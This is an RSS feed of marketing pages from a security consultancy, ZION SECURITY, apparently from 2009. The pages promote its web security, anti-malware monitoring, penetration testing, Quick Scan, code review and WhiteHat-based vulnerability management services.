<p class="contenttext">Please <a href="/contact.aspx">consult</a> one of our representatives for more information or a quote.</p>]]></content:encoded></item><item><title>Web Security</title><link>http://www.zionsecurity.com/solutions/web-security.aspx</link><pubDate>2009-09-22T09:55:00</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-security.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_179x54.jpg"  width="179"  height="54" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Security</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY cooperates with Scansafe to protect your users against web based threats.</p>
<p class="contenttext">ScanSafe is the pioneer and largest global provider of SaaS (Software as a Service)&nbsp;Web Security, ensuring a safe and productive Internet environment for businesses.</p>
<p class="contenttext">ScanSafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web. As a SaaS solution, ScanSafe eliminates the burden of purchasing and maintaining infrastructure in-house, significantly lowering the total cost of ownership.</p>
<p class="contenttext">Powered by its proactive, multilayered Outbreak Intelligence<sup>TM</sup> threat detection technology, ScanSafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.</p>
<p class="contenttext">Discover now the different possibilites and solutions like <a href="/solutions/web-security/web-filtering.aspx">Web Filtering</a>, <a href="/solutions/web-security/web-malware-scanning.aspx">Web Malware scanning&nbsp;</a>and <a href="/solutions/web-security/anywhere-plus.aspx">Anywhere+</a> (which protects your remote workers).</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_179x54.jpg"  width="179"  height="54" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Security</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY cooperates with Scansafe to protect your users against web based threats.</p>
<p class="contenttext">ScanSafe is the pioneer and largest global provider of SaaS (Software as a Service)&nbsp;Web Security, ensuring a safe and productive Internet environment for businesses.</p>
<p class="contenttext">ScanSafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web. As a SaaS solution, ScanSafe eliminates the burden of purchasing and maintaining infrastructure in-house, significantly lowering the total cost of ownership.</p>
<p class="contenttext">Powered by its proactive, multilayered Outbreak Intelligence<sup>TM</sup> threat detection technology, ScanSafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.</p>
<p class="contenttext">Discover now the different possibilites and solutions like <a href="/solutions/web-security/web-filtering.aspx">Web Filtering</a>, <a href="/solutions/web-security/web-malware-scanning.aspx">Web Malware scanning&nbsp;</a>and <a href="/solutions/web-security/anywhere-plus.aspx">Anywhere+</a> (which protects your remote workers).</p>]]></content:encoded></item><item><title>Web Anti-Malware</title><link>http://www.zionsecurity.com/solutions/web-anti-malware.aspx</link><pubDate>2009-09-21T16:13:28</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-anti-malware.aspx</guid><description><![CDATA[ <div style="float:right;">
<table border="0" class="dasientform" style="width: 200px;">
<tbody>
<tr>
<td>Enter your website!</td>
</tr>
<tr>
<td>
<?UMBRACO_MACRO macroAlias="DasientControlForm" />
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Anti-Malware</span></p>
<p class="contenttext">Planting malware is evaluating into a growing and concerning problem. Over the last two years there was a 600% increase in web based attacks. Hackers target legitimate web sites to plant malware. At this moment more than 1 million pages are infected per month. Several reports claim that planting malware on target web sites was already the number one security attack for online criminals last year (2008). &nbsp;</p>
<p class="contenttext">Web malware infections can have a serious impact on business revenue. Google, Firefox, Internet Explorer and anti-virus companies blacklist infected websites. On top of that, your website suffers damage concerning brand and reputation by infecting visitors.</p>
<p class="contenttext">Our Web Anti-Malware (WAM)&nbsp;solution, part of ZI<strong class="red">O</strong>N VERIFIED,&nbsp;consists of two services:<a href="/solutions/web-anti-malware/blacklist-monitoring.aspx"> Blacklist monitoring </a>and <a href="/oplossingen/web-anti-malware/malware-monitoring.aspx">Malware monitoring</a>.</p>]]></description><content:encoded><![CDATA[ <div style="float:right;">
<table border="0" class="dasientform" style="width: 200px;">
<tbody>
<tr>
<td>Enter your website!</td>
</tr>
<tr>
<td>
<?UMBRACO_MACRO macroAlias="DasientControlForm" />
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Anti-Malware</span></p>
<p class="contenttext">Planting malware is evaluating into a growing and concerning problem. Over the last two years there was a 600% increase in web based attacks. Hackers target legitimate web sites to plant malware. At this moment more than 1 million pages are infected per month. Several reports claim that planting malware on target web sites was already the number one security attack for online criminals last year (2008). &nbsp;</p>
<p class="contenttext">Web malware infections can have a serious impact on business revenue. Google, Firefox, Internet Explorer and anti-virus companies blacklist infected websites. On top of that, your website suffers damage concerning brand and reputation by infecting visitors.</p>
<p class="contenttext">Our Web Anti-Malware (WAM)&nbsp;solution, part of ZI<strong class="red">O</strong>N VERIFIED,&nbsp;consists of two services:<a href="/solutions/web-anti-malware/blacklist-monitoring.aspx"> Blacklist monitoring </a>and <a href="/oplossingen/web-anti-malware/malware-monitoring.aspx">Malware monitoring</a>.</p>]]></content:encoded></item><item><title>ZION VERIFIED</title><link>http://www.zionsecurity.com/solutions/zion-verified.aspx</link><pubDate>2009-09-21T15:36:13</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-verified.aspx</guid><description><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title">&nbsp;<img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N VERIFIED</span></p>
<p class="contenttext"><span>What are organizations doing at this moment to protect their critical web applications?</span></p>
<p class="contenttext"><span>Organizations rely on a third party to execute <a href="/solutions/penetration-test.aspx">penetration tests</a>. This is a manual test performed by security experts.&nbsp;The penetration test detects all kind of leaks and vulnerabilities in the application or infrastructure. The third party delivers a list with vulnerabilities that have to be solved by the organization itself.</span></p>
<p class="contenttext"><span>Unfortunately, at this point the penetration test stops and in most cases the list of vulnerabilities will not be followed up by the third party...</span></p>
<p class="contenttext"><span>Over the last couple years we investigated that practically every (medium or large) organization has difficulties to solve the vulnerabilities and leaks the penetration test had detected.</span></p>
<p class="contenttext"><span><strong>However website security is more than just detecting vulnerabilities and leaks. I</strong><strong>t's about scanning, detecting, fixing and retesting the vulnerabilities in your website. It's a never ending security lifecycle that has to be monitored 24/24, 7/7. </strong></span></p>
<p class="contenttext"><span>Discover here how ZI<strong class="red">O</strong>N VERIFIED helps&nbsp;organizations to manage their web security risks.</span></p>]]></description><content:encoded><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title">&nbsp;<img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N VERIFIED</span></p>
<p class="contenttext"><span>What are organizations doing at this moment to protect their critical web applications?</span></p>
<p class="contenttext"><span>Organizations rely on a third party to execute <a href="/solutions/penetration-test.aspx">penetration tests</a>. This is a manual test performed by security experts.&nbsp;The penetration test detects all kind of leaks and vulnerabilities in the application or infrastructure. The third party delivers a list with vulnerabilities that have to be solved by the organization itself.</span></p>
<p class="contenttext"><span>Unfortunately, at this point the penetration test stops and in most cases the list of vulnerabilities will not be followed up by the third party...</span></p>
<p class="contenttext"><span>Over the last couple years we investigated that practically every (medium or large) organization has difficulties to solve the vulnerabilities and leaks the penetration test had detected.</span></p>
<p class="contenttext"><span><strong>However website security is more than just detecting vulnerabilities and leaks. I</strong><strong>t's about scanning, detecting, fixing and retesting the vulnerabilities in your website. It's a never ending security lifecycle that has to be monitored 24/24, 7/7. </strong></span></p>
<p class="contenttext"><span>Discover here how ZI<strong class="red">O</strong>N VERIFIED helps&nbsp;organizations to manage their web security risks.</span></p>]]></content:encoded></item><item><title>Security testing</title><link>http://www.zionsecurity.com/solutions/security-testing.aspx</link><pubDate>2009-08-10T12:18:57</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/security-testing.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Security testing</span></p>
<p class="contenttext">The ideal situation for the customer and ZI<strong class="red">O</strong>N SECURITY is that&nbsp;security tests are executed during the development phase, together with functional testing and stress testing.</p>
<p class="contenttext">The main purpose of security testing is to identify the existence of security controls like authentication, authorization and input validation.</p>
<p class="contenttext">For example the risks for authentication and&nbsp;authorization include access to the system by an unauthorized user, theft of usernames or passwords and password cracking/dictionary attacks, and ability to bypass authentication or authentication logging.</p>
<p class="contenttext">All attacks and tests are executed manually. ZI<strong class="red">O</strong>N SECURITY only uses automated tools for specific functions like brute-forcing ports, passwords, identifiers,...</p>
<p class="contenttext">Security tests are mostly focused on one single application and our security experts follow a certain methodology:</p>
<ol class="agenda">
<li>Our security experts test and scan&nbsp;the application for vulnerabilities and leaks</li>
<li>We insert reports and bugs in the customer's bugtracking system</li>
<li>Our security experts retest the application</li>
<li>Final report that will be discussed at length with the responsible person regarding these matters in the company</li>
</ol>
<p class="contenttext">In a first meeting, the methodology will be discussed and can be adapted on customer demand.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Files</span></p>
<p class="contenttext"><a href="/protected/ZION SECURITY Services - Security Testing.pdf">ZION SECURITY Services - Security Testing.pdf</a></p>
<p><span class="title">&nbsp;<img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Interested?</span></p>
<p class="contenttext"><a href="/contact.aspx">Ask</a> here for more information or&nbsp;an offer without obligation.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Security testing</span></p>
<p class="contenttext">The ideal situation for the customer and ZI<strong class="red">O</strong>N SECURITY is that&nbsp;security tests are executed during the development phase, together with functional testing and stress testing.</p>
<p class="contenttext">The main purpose of security testing is to identify the existence of security controls like authentication, authorization and input validation.</p>
<p class="contenttext">For example the risks for authentication and&nbsp;authorization include access to the system by an unauthorized user, theft of usernames or passwords and password cracking/dictionary attacks, and ability to bypass authentication or authentication logging.</p>
<p class="contenttext">All attacks and tests are executed manually. ZI<strong class="red">O</strong>N SECURITY only uses automated tools for specific functions like brute-forcing ports, passwords, identifiers,...</p>
<p class="contenttext">Security tests are mostly focused on one single application and our security experts follow a certain methodology:</p>
<ol class="agenda">
<li>Our security experts test and scan&nbsp;the application for vulnerabilities and leaks</li>
<li>We insert reports and bugs in the customer's bugtracking system</li>
<li>Our security experts retest the application</li>
<li>Final report that will be discussed at length with the responsible person regarding these matters in the company</li>
</ol>
<p class="contenttext">In a first meeting, the methodology will be discussed and can be adapted on customer demand.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Files</span></p>
<p class="contenttext"><a href="/protected/ZION SECURITY Services - Security Testing.pdf">ZION SECURITY Services - Security Testing.pdf</a></p>
<p><span class="title">&nbsp;<img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Interested?</span></p>
<p class="contenttext"><a href="/contact.aspx">Ask</a> here for more information or&nbsp;an offer without obligation.</p>]]></content:encoded></item><item><title>Quick Scan</title><link>http://www.zionsecurity.com/solutions/quick-scan.aspx</link><pubDate>2009-08-10T11:06:28</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/quick-scan.aspx</guid><description><![CDATA[ <p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Quick Scan</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY developed on customer demand&nbsp;a specific solution called Quick Scan.</p>
<p class="contenttext">When choosing a <a href="/solutions/penetration-test.aspx?show=Penetration test">penetration test</a>, the customer has the possibility to test and scan&nbsp;the entire&nbsp;infrastructure and applications for leaks and vulnerabilities.</p>
<p class="contenttext">The difference between a penetration test and&nbsp;Quick Scan is that&nbsp;a Quick Scan is a lighter version of the penetration test. Here the scope and time are limited.&nbsp;The customer indicates in a first meeting&nbsp;which application or infrastructure has to be tested for vulnerabilities and leaks.</p>
<p class="contenttext">Upon completion of the Quick Scan&nbsp;the customer&nbsp;will receive a final report containing a list of vulnerabilities and leaks. The report also contains a plan of operation indicating the priority, possible cost and the time of implementation.</p>
<p class="contenttext">This report&nbsp;can be discussed with the responsible person regarding these matters in the company.</p>
<p class="contenttext">Our Quick Scan is ideal for organisations&nbsp;that want to have a global&nbsp;idea about the security level of their infrastructure and applications.</p>
<p class="contenttext">A Quick Scan can also be customized, for example an extensive scan of one specific application.</p>
<p>&nbsp;<span class="title">&nbsp; <img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Interested?</span></p>
<p class="contenttext"><a href="/contact.aspx">Ask</a> here for more information or&nbsp;an offer without obligation.</p>]]></description><content:encoded><![CDATA[ <p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Quick Scan</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY developed on customer demand&nbsp;a specific solution called Quick Scan.</p>
<p class="contenttext">When choosing a <a href="/solutions/penetration-test.aspx?show=Penetration test">penetration test</a>, the customer has the possibility to test and scan&nbsp;the entire&nbsp;infrastructure and applications for leaks and vulnerabilities.</p>
<p class="contenttext">The difference between a penetration test and&nbsp;Quick Scan is that&nbsp;a Quick Scan is a lighter version of the penetration test. Here the scope and time are limited.&nbsp;The customer indicates in a first meeting&nbsp;which application or infrastructure has to be tested for vulnerabilities and leaks.</p>
<p class="contenttext">Upon completion of the Quick Scan&nbsp;the customer&nbsp;will receive a final report containing a list of vulnerabilities and leaks. The report also contains a plan of operation indicating the priority, possible cost and the time of implementation.</p>
<p class="contenttext">This report&nbsp;can be discussed with the responsible person regarding these matters in the company.</p>
<p class="contenttext">Our Quick Scan is ideal for organisations&nbsp;that want to have a global&nbsp;idea about the security level of their infrastructure and applications.</p>
<p class="contenttext">A Quick Scan can also be customized, for example an extensive scan of one specific application.</p>
<p>&nbsp;<span class="title">&nbsp; <img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Interested?</span></p>
<p class="contenttext"><a href="/contact.aspx">Ask</a> here for more information or&nbsp;an offer without obligation.</p>]]></content:encoded></item><item><title>Code review</title><link>http://www.zionsecurity.com/solutions/code-review.aspx</link><pubDate>2009-08-10T09:54:46</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/code-review.aspx</guid><description><![CDATA[ <p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Code review</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY is expert in executing code reviews, manually or automated. A code review is required when the objective is to find all vulnerabilities and backdoors in a (web) application. Often we complement code review with security testing to verify the exploitability of the identified vulnerability.</p>
<p class="contenttext">Code review also allows to give in depth countermeasures to secure the application and to train developers to prevent future holes.</p>
<p class="contenttext">During most code reviews we have identified security issues in the business logic of the application, which would not have been found using a <a href="/solutions/penetration-test.aspx">penetration test </a>approach.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Files</span></p>
<p class="contenttext"><a href="/protected/ZION SECURITY Services - Code Review.pdf">ZION SECURITY Services - Code Review.pdf</a></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Want to know more?</span></p>
<p class="contenttext">For more information or a specific quote adapted to your situation, please feel free to <a href="http://www.zionsecurity.com/contact.aspx">contact</a> one of our representatives.</p>]]></description><content:encoded><![CDATA[ <p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Code review</span></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY is expert in executing code reviews, manually or automated. A code review is required when the objective is to find all vulnerabilities and backdoors in a (web) application. Often we complement code review with security testing to verify the exploitability of the identified vulnerability.</p>
<p class="contenttext">Code review also allows to give in depth countermeasures to secure the application and to train developers to prevent future holes.</p>
<p class="contenttext">During most code reviews we have identified security issues in the business logic of the application, which would not have been found using a <a href="/solutions/penetration-test.aspx">penetration test </a>approach.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Files</span></p>
<p class="contenttext"><a href="/protected/ZION SECURITY Services - Code Review.pdf">ZION SECURITY Services - Code Review.pdf</a></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Want to know more?</span></p>
<p class="contenttext">For more information or a specific quote adapted to your situation, please feel free to <a href="http://www.zionsecurity.com/contact.aspx">contact</a> one of our representatives.</p>]]></content:encoded></item><item><title>WhiteHat</title><link>http://www.zionsecurity.com/solutions/zion-verified/whitehat.aspx</link><pubDate>2009-08-07T12:41:37</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-verified/whitehat.aspx</guid><description><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>WhiteHat</span></p>
<p class="contenttext"><span>ZI<strong class="red">O</strong>N VERIFIED is a unique service consisting of a combination of software (WhiteHat Sentinel)&nbsp;and manual testing. <strong>ZI<strong class="red">O</strong>N SECURITY is the first enterprise in Europe that has the right to use this software.</strong></span></p>
<p class="contenttext"><span><a href="/partners/whitehat-security.aspx">WhiteHat Security </a>is a leading American&nbsp;provider of website security services. It was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security.</span></p>
<p class="contenttext"><span>WhiteHat Sentinel is the most accurate, complete and cost-effective website vulnerability management solution available on the market. WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.</span></p>
<p class="contenttext"><span>This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.</span></p>
<p>&nbsp;<img src="/media/16330/whitehat custom code_499x269.jpg"  width="499"  height="269" alt="WhiteHat custom code"/></p>
<p class="contenttext"><span>As you might know, there are currently 24 broad classes of attacks. And, since every web application is unique, we're dealing with known classes of vulnerabilities in completely&nbsp;unknown code.&nbsp;The challenge is to figure out in each unique website, exactly where and how these vulnerabilities are implemented in the code. That's where WhiteHat Sentinel differentiates from other products.</span></p>
<p class="contenttext"><span>Most of medium and large&nbsp;organizations in America, with critical web applications, are already using WhiteHat.</span></p>]]></description><content:encoded><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>WhiteHat</span></p>
<p class="contenttext"><span>ZI<strong class="red">O</strong>N VERIFIED is a unique service consisting of a combination of software (WhiteHat Sentinel)&nbsp;and manual testing. <strong>ZI<strong class="red">O</strong>N SECURITY is the first enterprise in Europe that has the right to use this software.</strong></span></p>
<p class="contenttext"><span><a href="/partners/whitehat-security.aspx">WhiteHat Security </a>is a leading American&nbsp;provider of website security services. It was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security.</span></p>
<p class="contenttext"><span>WhiteHat Sentinel is the most accurate, complete and cost-effective website vulnerability management solution available on the market. WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.</span></p>
<p class="contenttext"><span>This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.</span></p>
<p>&nbsp;<img src="/media/16330/whitehat custom code_499x269.jpg"  width="499"  height="269" alt="WhiteHat custom code"/></p>
<p class="contenttext"><span>As you might know, there are currently 24 broad classes of attacks. And, since every web application is unique, we're dealing with known classes of vulnerabilities in completely&nbsp;unknown code.&nbsp;The challenge is to figure out in each unique website, exactly where and how these vulnerabilities are implemented in the code. That's where WhiteHat Sentinel differentiates from other products.</span></p>
<p class="contenttext"><span>Most of medium and large&nbsp;organizations in America, with critical web applications, are already using WhiteHat.</span></p>]]></content:encoded></item><item><title>Different modules</title><link>http://www.zionsecurity.com/solutions/zion-verified/different-modules.aspx</link><pubDate>2009-08-07T12:25:27</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-verified/different-modules.aspx</guid><description><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N VERIFIED: Different modules</span></p>
<p class="contenttext"><span>We developed, on customer demand, different modules:</span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED Light</strong> allows you to scan and retest&nbsp;your applications&nbsp;solely using&nbsp;the automatic software of WhiteHat.</span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED </strong></span><span><strong>Business</strong> allows you to scan and retest your applications with WhiteHat&nbsp;in combination with&nbsp;manual tests performed by our security experts</span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED </strong></span><span><strong>PCI</strong>: </span><span>The difference with ZI<strong class="red">O</strong>N VERIFIED Business is that we add an "introduction to web application security" training to satisfy PCI compliancy and we can generate a PCI report. </span></p>
<p class="contenttext">The course provides an overview of the fundamental principles of website security and meets PCI-DSS requirement 6.5b which covers developer training on secure coding techniques. All participants will receive a certificate confirming course completion.</p>
<p class="contenttext">The ZI<strong class="red">O</strong>N VERIFIED PCI report delivers both an overview and an in-depth look into the PCI compliance of each website under management. For each vulnerability class, the report details how the vulnerability is exploited, gives protection advice and lists links to reference information. Open vulnerabilities of each class on the customer's website are also listed.</p>
<p class="contenttext"><a href="/contact.aspx">Contact</a> one of our experts for more information or a quote without obligation.</p>]]></description><content:encoded><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>ZI<strong class="red">O</strong>N VERIFIED: Different modules</span></p>
<p class="contenttext"><span>We developed, on customer demand, different modules:</span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED Light</strong> allows you to scan and retest&nbsp;your applications&nbsp;solely using&nbsp;the automatic software of WhiteHat.</span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED </strong></span><span><strong>Business</strong> allows you to scan and retest your applications with WhiteHat&nbsp;in combination with&nbsp;manual tests performed by our security experts</span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED </strong></span><span><strong>PCI</strong>: </span><span>The difference with ZI<strong class="red">O</strong>N VERIFIED Business is that we add an "introduction to web application security" training to satisfy PCI compliancy and we can generate a PCI report. </span></p>
<p class="contenttext">The course provides an overview of the fundamental principles of website security and meets PCI-DSS requirement 6.5b which covers developer training on secure coding techniques. All participants will receive a certificate confirming course completion.</p>
<p class="contenttext">The ZI<strong class="red">O</strong>N VERIFIED PCI report delivers both an overview and an in-depth look into the PCI compliance of each website under management. For each vulnerability class, the report details how the vulnerability is exploited, gives protection advice and lists links to reference information. Open vulnerabilities of each class on the customer's website are also listed.</p>
<p class="contenttext"><a href="/contact.aspx">Contact</a> one of our experts for more information or a quote without obligation.</p>]]></content:encoded></item><item><title>What is ZION VERIFIED?</title><link>http://www.zionsecurity.com/solutions/zion-verified/what-is-zion-verified.aspx</link><pubDate>2009-08-07T11:34:05</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/zion-verified/what-is-zion-verified.aspx</guid><description><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>What is ZI<strong class="red">O</strong>N VERIFIED?</span></p>
<p class="contenttext"><span>ZI<strong class="red">O</strong>N VERIFIED closes the gap between detecting, fixing and retesting vulnerabilities in your web applications.&nbsp;</span></p>
<p class="contenttext"><span>ZI<strong class="red">O</strong>N VERIFIED scans your web applications at&nbsp;regular intervals. We find your vulnerabilities, propose a solution to your development team and prove that they were resolved by verifying the solution.</span></p>
<p class="contenttext"><span>Our service consists of a combination of software and manual tests. The software comes from <a href="/solutions/zion-verified/whitehat.aspx">WhiteHat</a>, an American web application security company. This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.</span></p>
<p class="contenttext"><span>Aside from using the software to test your applications, our security experts also perform manual tests on your critical applications.</span></p>
<p class="contenttext"><span>FOR A FIXED AMOUNT EACH YEAR!</span></p>
<p class="contenttext"><span><img src="/img-sec/scanfixverify.jpg"/></span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED handles your web applications vulnerability management for you.</strong> However, it also <strong>puts you in the driver's seat</strong> of multitude tasks that put you in charge.</span></p>
<p class="contenttext"><span>&nbsp;You can:</span></p>
<ul class="agenda">
<li>Request to schedule a new scan for an application.</li>
<li>Request a manual retest of a vulnerability that you already addressed.</li>
<li>Send a general support question about software security to ZI<strong class="red">O</strong>N SECURITY.</li>
<li>Receive vulnerability reports in HTML format. As ZI<strong class="red">O</strong>N VERIFIED identifies vulnerabilities, it classifies them according to the 24 Web Application Security Consortium (WASC) vulnerability classes and the OWASP Top 10.</li>
<li>...&nbsp; </li>
</ul>
<p class="contenttext">ZI<strong class="red">O</strong>N VERIFIED&nbsp;scans for business logic flaws and vulnerabilities. It&nbsp;tests for example&nbsp;the <a href="/company/membership.aspx">OWASP</a> Top 10 and the WASC 24 classes. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. ZI<strong class="red">O</strong>N VERIFIED is always up to date with the newest vulnerabilities.</p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N SECURITY is the first European company that can offer this new and innovative service toward his customers!</strong></span></p>]]></description><content:encoded><![CDATA[ <div style="float:right;"><img src="/img-sec/zion_verified.gif" width="203" height="76" border="0" align="top"/></div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>What is ZI<strong class="red">O</strong>N VERIFIED?</span></p>
<p class="contenttext"><span>ZI<strong class="red">O</strong>N VERIFIED closes the gap between detecting, fixing and retesting vulnerabilities in your web applications.&nbsp;</span></p>
<p class="contenttext"><span>ZI<strong class="red">O</strong>N VERIFIED scans your web applications at&nbsp;regular intervals. We find your vulnerabilities, propose a solution to your development team and prove that they were resolved by verifying the solution.</span></p>
<p class="contenttext"><span>Our service consists of a combination of software and manual tests. The software comes from <a href="/solutions/zion-verified/whitehat.aspx">WhiteHat</a>, an American web application security company. This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.</span></p>
<p class="contenttext"><span>Aside from using the software to test your applications, our security experts also perform manual tests on your critical applications.</span></p>
<p class="contenttext"><span>FOR A FIXED AMOUNT EACH YEAR!</span></p>
<p class="contenttext"><span><img src="/img-sec/scanfixverify.jpg"/></span></p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N VERIFIED handles your web applications vulnerability management for you.</strong> However, it also <strong>puts you in the driver's seat</strong> of multitude tasks that put you in charge.</span></p>
<p class="contenttext"><span>&nbsp;You can:</span></p>
<ul class="agenda">
<li>Request to schedule a new scan for an application.</li>
<li>Request a manual retest of a vulnerability that you already addressed.</li>
<li>Send a general support question about software security to ZI<strong class="red">O</strong>N SECURITY.</li>
<li>Receive vulnerability reports in HTML format. As ZI<strong class="red">O</strong>N VERIFIED identifies vulnerabilities, it classifies them according to the 24 Web Application Security Consortium (WASC) vulnerability classes and the OWASP Top 10.</li>
<li>...&nbsp; </li>
</ul>
<p class="contenttext">ZI<strong class="red">O</strong>N VERIFIED&nbsp;scans for business logic flaws and vulnerabilities. It&nbsp;tests for example&nbsp;the <a href="/company/membership.aspx">OWASP</a> Top 10 and the WASC 24 classes. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. ZI<strong class="red">O</strong>N VERIFIED is always up to date with the newest vulnerabilities.</p>
<p class="contenttext"><span><strong>ZI<strong class="red">O</strong>N SECURITY is the first European company that can offer this new and innovative service toward his customers!</strong></span></p>]]></content:encoded></item><item><title>Tufin: How to get it?</title><link>http://www.zionsecurity.com/partners/tufin/tufin-how-to-get-it.aspx</link><pubDate>2009-08-07T10:22:21</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/tufin/tufin-how-to-get-it.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Tufin: How to get it?</span></p>
<p class="contenttext">For a live demo or a quote, please feel free to <a href="http://www.zionsecurity.com/contact.aspx">contact</a> one of our representatives.</p>
